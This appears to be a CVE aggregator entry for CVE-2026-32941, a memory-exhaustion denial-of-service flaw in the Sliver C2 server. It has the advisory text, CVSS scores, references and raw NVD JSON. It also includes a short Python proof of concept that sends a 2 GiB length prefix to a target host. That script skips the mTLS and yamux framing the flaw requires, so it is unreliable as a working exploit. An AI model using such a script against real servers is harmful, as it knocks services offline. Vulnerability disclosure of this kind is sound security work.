CVE-2026-32941

Description

Sliver is a command and control framework that uses a custom Wireguard netstack. Versions 1.7.3 and below contain a Remote OOM (Out-of-Memory) vulnerability in the Sliver C2 server's mTLS and WireGuard C2 transport layer. The socketReadEnvelope and socketWGReadEnvelope functions trust an attacker-controlled 4-byte length prefix to allocate memory, with ServerMaxMessageSize allowing single allocations of up to ~2 GiB. A compromised implant or an attacker with valid credentials can exploit this by sending fabricated length prefixes over concurrent yamux streams (up to 128 per connection), forcing the server to attempt allocating ~256 GiB of memory and triggering an OS OOM kill. This crashes the Sliver server, disrupts all active implant sessions, and may degrade or kill other processes sharing the same host. The same pattern also affects all implant-side readers, which have no upper-bound check at all. The issue was not fixed at the the time of publication.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:bishopfox:sliver:*:*:*:*:*:*:*:* - VULNERABLE

Sliver <= 1.7.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct
import time

# Target configuration
TARGET_HOST = '192.168.1.100'
TARGET_PORT = 8888  # Default Sliver C2 port (example)
NUM_STREAMS = 128   # Max concurrent yamux streams mentioned

# Max message size allowed is ~2GB, we send a large value to trigger OOM
# 2GB = 2147483648 bytes
MALICIOUS_SIZE = 2147483648 

def send_malicious_packet():
    try:
        # Establish TCP connection to Sliver C2
        print(f"[*] Connecting to {TARGET_HOST}:{TARGET_PORT}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # Simulate sending the length prefix (Big Endian)
        # The server reads 4 bytes as length and allocates memory accordingly
        payload_prefix = struct.pack('>I', MALICIOUS_SIZE)
        
        print(f"[*] Sending malicious length prefix: {MALICIOUS_SIZE} bytes")
        s.sendall(payload_prefix)
        
        # Keep connection open to prevent immediate reset during allocation attempt
        # Real exploitation might involve yamux protocol framing
        print("[*] Packet sent, waiting for server response/timeout...")
        time.sleep(5)
        
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    # In a real attack, this would be looped or threaded for NUM_STREAMS
    send_malicious_packet()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32941
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32941
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32941/
[4] VulDB https://vuldb.com/cve/CVE-2026-32941
[5] https://github.com/BishopFox/sliver/security/advisories/GHSA-97vp-pwqj-46qc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32941", "sourceIdentifier": "[email protected]", "published": "2026-03-20T04:16:49.560", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sliver is a command and control framework that uses a custom Wireguard netstack. Versions 1.7.3 and below contain a Remote OOM (Out-of-Memory) vulnerability in the Sliver C2 server's mTLS and WireGuard C2 transport layer. The socketReadEnvelope and socketWGReadEnvelope functions trust an attacker-controlled 4-byte length prefix to allocate memory, with ServerMaxMessageSize allowing single allocations of up to ~2 GiB. A compromised implant or an attacker with valid credentials can exploit this by sending fabricated length prefixes over concurrent yamux streams (up to 128 per connection), forcing the server to attempt allocating ~256 GiB of memory and triggering an OS OOM kill. This crashes the Sliver server, disrupts all active implant sessions, and may degrade or kill other processes sharing the same host. The same pattern also affects all implant-side readers, which have no upper-bound check at all. The issue was not fixed at the the time of publication."}, {"lang": "es", "value": "Sliver es un framework de comando y control que utiliza una pila de red Wireguard personalizada. Las versiones 1.7.3 e inferiores contienen una vulnerabilidad remota de OOM (Out-of-Memory) en la capa de transporte mTLS y WireGuard C2 del servidor C2 de Sliver. Las funciones socketReadEnvelope y socketWGReadEnvelope confían en un prefijo de longitud de 4 bytes controlado por el atacante para asignar memoria, con ServerMaxMessageSize permitiendo asignaciones únicas de hasta ~2 GiB. Un implante comprometido o un atacante con credenciales válidas puede explotar esto enviando prefijos de longitud fabricados a través de flujos yamux concurrentes (hasta 128 por conexión), forzando al servidor a intentar asignar ~256 GiB de memoria y desencadenando una eliminación OOM del sistema operativo. Esto bloquea el servidor de Sliver, interrumpe todas las sesiones de implantes activas y puede degradar o eliminar otros procesos que comparten el mismo host. El mismo patrón también afecta a todos los lectores del lado del implante, que no tienen ninguna verificación de límite superior. El problema no se había solucionado en el momento de la publicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}, {"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bishopfox:sliver:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.3", "matchCriteriaId": "3F9D34DC-4587-4F54-A769-5B833439B841"}]}]}], "references": [{"url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-97vp-pwqj-46qc", "source": "securi ... (truncated)